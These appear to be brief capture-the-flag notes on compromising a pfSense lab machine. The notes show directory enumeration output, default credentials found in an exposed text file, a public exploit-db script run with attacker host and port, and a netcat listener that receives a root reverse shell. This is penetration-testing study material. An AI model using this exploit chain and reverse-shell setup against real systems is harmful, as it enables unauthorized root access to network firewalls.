2 :80 pfsense
===============================================================
2021/05/01 14:23:47 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 329]
/help.php (Status: 200) [Size: 6689]
/themes (Status: 301) [Size: 0] [--> https://10.10.10.60/themes/]
/stats.php (Status: 200) [Size: 6690]
/index.php (Status: 200) [Size: 6690]
/css (Status: 301) [Size: 0] [--> https://10.10.10.60/css/]
/edit.php (Status: 200) [Size: 6689]
/includes (Status: 301) [Size: 0] [--> https://10.10.10.60/includes/]
/license.php (Status: 200) [Size: 6692]
/status.php (Status: 200) [Size: 6691]
/system.php (Status: 200) [Size: 6691]
/javascript (Status: 301) [Size: 0] [--> https://10.10.10.60/javascript/]
/changelog.txt (Status: 200) [Size: 271]
/classes (Status: 301) [Size: 0] [--> https://10.10.10.60/classes/]
/exec.php (Status: 200) [Size: 6689]
/widgets (Status: 301) [Size: 0] [--> https://10.10.10.60/widgets/]
/graph.php (Status: 200) [Size: 6690]
/tree (Status: 301) [Size: 0] [--> https://10.10.10.60/tree/]
/wizard.php (Status: 200) [Size: 6691]
/shortcuts (Status: 301) [Size: 0] [--> https://10.10.10.60/shortcuts/]
/pkg.php (Status: 200) [Size: 6688]
/installer (Status: 301) [Size: 0] [--> https://10.10.10.60/installer/]
/wizards (Status: 301) [Size: 0] [--> https://10.10.10.60/wizards/]
/xmlrpc.php (Status: 200) [Size: 384]
/interfaces.php
/system-users.txt (Status: 200)
=> https://10.10.10.60/changelog.txt
# Security Changelog
### Issue
There was a failure in updating the firewall. Manual patching is therefore required
### Mitigated
2 of 3 vulnerabilities have been patched.
### Timeline
The remaining patches will be installed during the next maintenance window
=> => https://10.10.10.60/system-users.txt
####Support ticket###
Please create the following user
username: Rohit
password: company defaults
We can login using rohit:pfsense Version: 2.1.3-RELEASE (amd64)
Using https://www.exploit-db.com/exploits/43560
$ python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.10 --lport 443 --username rohit --password pfsense
CSRF token obtained
Running exploit...
Exploit completed
$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.60] 31033
sh: can't access tty; job control turned off
whoami;id
root
uid=0(root) gid=0(wheel) groups=0(wheel
Last updated